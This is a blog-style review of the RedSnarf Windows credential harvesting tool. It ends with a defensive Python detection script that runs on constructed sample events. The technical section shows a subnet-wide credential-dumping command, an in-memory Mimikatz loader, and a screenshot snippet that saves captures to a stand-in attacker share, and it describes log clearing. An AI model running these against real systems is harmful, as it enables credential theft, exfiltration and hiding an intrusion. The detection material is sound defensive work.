
RedSnarf: The Post-Exploitation Credential Harvester That Time (Almost) Forgot


Hook

In penetration testing, the hardest part isn't breaking in—it's what you do in the first 15 minutes afterward. RedSnarf tries to answer that question by automating the entire credential harvesting playbook against Windows networks, assuming you've already got one valid set of credentials.

Context

Back in the mid-2010s, post-exploitation in Windows environments meant juggling a dozen different tools: Mimikatz for LSASS dumping, Impacket's secretsdump.py for remote SAM extraction, NTDSUtil for domain controller compromise, and custom scripts for everything else. Each technique required different syntax, different network protocols, and different operational considerations. Penetration testers spent valuable time context-switching between tools when they should have been focused on understanding the environment they'd compromised.

RedSnarf emerged from NCC Group as a Python orchestration layer that unified these disparate techniques behind a single command-line interface. Instead of remembering whether you need impacket-secretsdump or impacket-wmiexec, you point RedSnarf at a target with credentials and specify what you want: hashes, Kerberos tickets, screenshots, or full Active Directory compromise. The tool handles protocol selection, credential formatting, and result parsing. It's less a novel exploitation technique and more a time-saving wrapper around the Windows offensive security ecosystem—essentially a Makefile for credential theft.

Technical Insight

System architecture — auto-generated (diagram recovered as text)

  RedSnarf CLI
    --credentials + targets-->  SMB Authentication Layer
    --authenticated session-->  Attack Router
      --registry access-->      SAM/LSA Dump         --hashes-->            Credential Store
      --memory extraction-->    Mimikatz/ProcDump    --plaintext/hashes-->  Credential Store
      --DC replication-->       DCSync via Impacket  --domain hashes-->     Credential Store

  External Tools: the Attack Router shells out to the Impacket Library and executes PowerShell Scripts.

RedSnarf's architecture is deceptively simple: it's a Python command-line tool that shells out to PowerShell scripts and third-party binaries, coordinating attacks through SMB connections. The core workflow involves establishing an authenticated SMB session using provided credentials (password or NTLM hash), determining available attack vectors based on target system privileges, and executing credential extraction routines that dump results to local files.

The tool's bread-and-butter operation is network-wide hash dumping. When you provide a CIDR range and credentials, RedSnarf iterates through hosts, establishing SMB connections and executing remote credential extraction:

# Simplified example of RedSnarf's approach
python redsnarf.py -H 192.168.1.0/24 -u administrator -p Password123 \
  -C all -cG golden -cM

This command tells RedSnarf to scan the entire /24 subnet, authenticate as administrator, grab all credentials (-C all), attempt a Golden Ticket attack (-cG), and extract credentials via Mimikatz (-cM). Behind the scenes, RedSnarf uses Impacket's SMBConnection to establish sessions, then leverages multiple extraction techniques:

For SAM/LSA dumping on member servers, it either uses Impacket's secretsdump.py directly or invokes CredDump7 (a Python port of pwdump) to parse registry hives. For domain controllers, the tool offers two paths: online DCSync via Impacket's drsuapi implementation (mimicking domain controller replication to extract password hashes) or offline extraction by copying NTDS.dit and SYSTEM hive files using Volume Shadow Copy Service.

The Mimikatz integration reveals RedSnarf's operational philosophy. Rather than uploading Mimikatz.exe directly (easily detected), it base64-encodes an obfuscated PowerShell script that reflectively loads Mimikatz into memory:

# RedSnarf's approach (simplified)
$code = [System.Text.Encoding]::UTF8.GetString(
  [System.Convert]::FromBase64String($EncodedMimikatz)
)
Invoke-Expression $code
Invoke-Mimikatz -DumpCreds

This PowerShell wrapper gets executed remotely via WMI or scheduled tasks, writes output to a network share or file, then cleans up event logs using wevtutil to reduce forensic artifacts. The tool even includes UAC bypass routines for scenarios where you have user credentials but need SYSTEM-level access—it copies the Windows accessibility binary Utilman.exe, replaces it with cmd.exe, then triggers it through remote registry manipulation.

Beyond credential theft, RedSnarf includes reconnaissance modules that hunt for logged-in users across the network (useful for targeting high-value accounts), capture screenshots from active sessions using PowerShell's Windows Forms APIs, and even record desktop sessions. The screenshot functionality is particularly clever:

# Remote screenshot capture technique
# Load the .NET assemblies the snippet depends on and pick the primary display
Add-Type -AssemblyName System.Windows.Forms, System.Drawing
$screen = [System.Windows.Forms.Screen]::PrimaryScreen
$bmp = New-Object System.Drawing.Bitmap($screen.Bounds.Width,
  $screen.Bounds.Height)
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($screen.Bounds.Location,
  [System.Drawing.Point]::Empty, $screen.Bounds.Size)
$bmp.Save("\\attacker\share\screenshot.png")

This code executes in the context of the logged-in user's session, capturing whatever's on-screen—useful for understanding what applications are running or identifying sensitive data exposure.

The tool's hash spraying capability deserves mention. If you've compromised one account's NTLM hash, you can test it against multiple systems without needing plaintext passwords. RedSnarf uses pass-the-hash techniques via Impacket to authenticate using only the hash value, enabling lateral movement without cracking passwords—a significant time-saver in large environments where password reuse is common.

Gotcha

RedSnarf's biggest limitation is that it requires valid credentials to do anything. This isn't a vulnerability scanner or exploit framework—you need a foothold first. For penetration tests starting from external reconnaissance, RedSnarf only becomes relevant after you've phished credentials, cracked a password, or exploited an application vulnerability to gain initial access. It's a post-exploitation tool through and through.

The tool's reliance on external dependencies creates practical problems. It requires specific versions of Impacket (v0.9.16-dev), exact file paths for Mimikatz and ProcDump binaries, and assumes a particular directory structure. Breaking changes in Impacket's API or unavailable download links for legacy CredDump7 builds can render functionality inoperable. The GitHub repository's last significant updates date from 2019-2020, meaning compatibility with Windows 10 21H2+, Windows 11, or Server 2022 is uncertain. Modern defensive features like Credential Guard (which isolates LSA secrets in a virtualized environment inaccessible to Mimikatz), Windows Defender Application Control, and enhanced AMSI integration may block RedSnarf's techniques entirely.

Detection is another concern. While RedSnarf includes event log clearing and attempts PowerShell obfuscation, modern EDR solutions monitor SMB connections, WMI execution, scheduled task creation, and PowerShell script blocks. The tool's reliance on well-known attack patterns (Mimikatz strings, DCSync network signatures) makes it easier to detect than custom tooling. Forensically, even with log clearing, artifacts remain in SRUM databases, prefetch files, and registry transaction logs. In security-conscious environments with mature monitoring, RedSnarf's activities would likely trigger alerts within minutes.
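The telemetry listed above is enough to spot the RedSnarf workflow described earlier (the base64-encoded PowerShell loader, remote execution through scheduled tasks, DCSync against a domain controller, and the wevtutil log clearing). The following detection script is an added example and is not part of RedSnarf or of NCC Group's code. It runs over constructed, tab-separated "key=value" event lines that stand in for Windows Security and PowerShell Operational events; the event IDs (4688 process creation, 4104 script block logging, 4698 scheduled task created, 4662 object access, 1102 audit log cleared) and the two directory-replication GUIDs are the standard Windows values, while the hostnames, account names and rule names are assumptions chosen for the sample.

```python
import base64
import re

# Extended-right GUIDs that appear in event 4662 "Properties" when an account
# performs directory replication: the network-level signature of DCSync.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

# Strings an in-memory Mimikatz loader leaves behind in PowerShell logging.
MIMIKATZ_MARKERS = ("invoke-mimikatz", "dumpcreds", "sekurlsa")


def decode_encoded_command(cmdline):
    """Return the text behind a -EncodedCommand / -enc argument, or None.

    PowerShell expects that argument to be base64 of UTF-16LE text, so a
    decoder has to use that encoding rather than UTF-8.
    """
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line):
    """Parse one constructed, tab-separated 'key=value' event line into a dict."""
    event = {}
    for field in line.split("\t"):
        key, _, value = field.partition("=")
        event[key] = value
    return event


def analyse(lines):
    """Apply the detection rules; return a list of (host, rule) findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        host, eid = ev.get("Host", "?"), ev.get("EventID")
        if eid == "4688":
            # Process creation: decode the encoded command line before matching
            decoded = decode_encoded_command(ev.get("CommandLine", ""))
            if decoded and any(mk in decoded.lower() for mk in MIMIKATZ_MARKERS):
                findings.append((host, "encoded-powershell-mimikatz"))
        elif eid == "4104":
            # Script block logging sees the decoded script even when obfuscated
            text = ev.get("ScriptBlockText", "").lower()
            if "frombase64string" in text and "invoke-expression" in text:
                findings.append((host, "base64-iex-loader"))
            if any(mk in text for mk in MIMIKATZ_MARKERS):
                findings.append((host, "mimikatz-scriptblock"))
        elif eid == "4698":
            # Scheduled task creation used as a remote execution channel
            if "powershell" in ev.get("TaskContent", "").lower():
                findings.append((host, "scheduled-task-powershell"))
        elif eid == "4662":
            # Replication rights exercised by a non-machine account (DCSync);
            # domain controller computer accounts (ending in $) replicate legitimately
            props = set(ev.get("Properties", "").split())
            if props & REPLICATION_GUIDS and not ev.get("Account", "").endswith("$"):
                findings.append((host, "dcsync-replication-rights"))
        elif eid == "1102":
            # wevtutil cl and similar log clearing always leave this event behind
            findings.append((host, "audit-log-cleared"))
    return findings


# Constructed sample events (not real exports); the encoded command is built
# here so the sample decodes cleanly.
SAMPLE_ENCODED = base64.b64encode("Invoke-Mimikatz -DumpCreds".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    "EventID=4624\tHost=WS01\tAccount=administrator\tLogonType=3",
    "EventID=4688\tHost=WS01\tCommandLine=powershell.exe -NoP -W Hidden -EncodedCommand " + SAMPLE_ENCODED,
    "EventID=4104\tHost=WS01\tScriptBlockText=$code = [System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String($EncodedMimikatz)); Invoke-Expression $code",
    "EventID=4698\tHost=WS01\tTaskName=\\update\tTaskContent=powershell.exe -enc ...",
    "EventID=4662\tHost=DC01\tAccount=administrator\tObjectType=domainDNS\t"
    "Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=4662\tHost=DC01\tAccount=DC02$\tObjectType=domainDNS\t"
    "Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=1102\tHost=WS01\tAccount=administrator",
]

if __name__ == "__main__":
    for host, rule in analyse(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Run against the sample, the script reports the encoded Mimikatz command, the base64/Invoke-Expression loader, the PowerShell scheduled task and the log clearing on WS01, plus the administrator's replication request on DC01, while ignoring the DC02$ machine account's legitimate replication. In a real deployment the rules would be fed from a SIEM query rather than the constructed lines, but the same logic applies: decode before matching, and treat 4662 replication rights from user accounts as the DCSync signal.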

Verdict

Use RedSnarf if you're performing penetration tests in environments with basic security controls (standalone antivirus, minimal logging, older Windows versions) and need to rapidly escalate from initial credentials to domain administrator. It's genuinely useful for automating repetitive credential dumping tasks across multiple systems during time-limited assessments, and its unified interface reduces cognitive overhead when you're juggling multiple attack paths. It also serves as an excellent educational tool for understanding the complete Windows post-exploitation workflow—reading through its code teaches you how different credential stores interact and which techniques apply in which scenarios.

Skip RedSnarf if you're red-teaming against environments with EDR deployment, Credential Guard, or active security operations centers. The tool's age and lack of active development mean you'll likely encounter broken functionality on modern Windows builds, and its detection profile is too high for operations requiring stealth. For those scenarios, invest time in learning CrackMapExec/NetExec or building custom tooling with better evasion characteristics. Also skip it if you need a supported, documented tool—expect to debug dependencies and adapt techniques yourself.
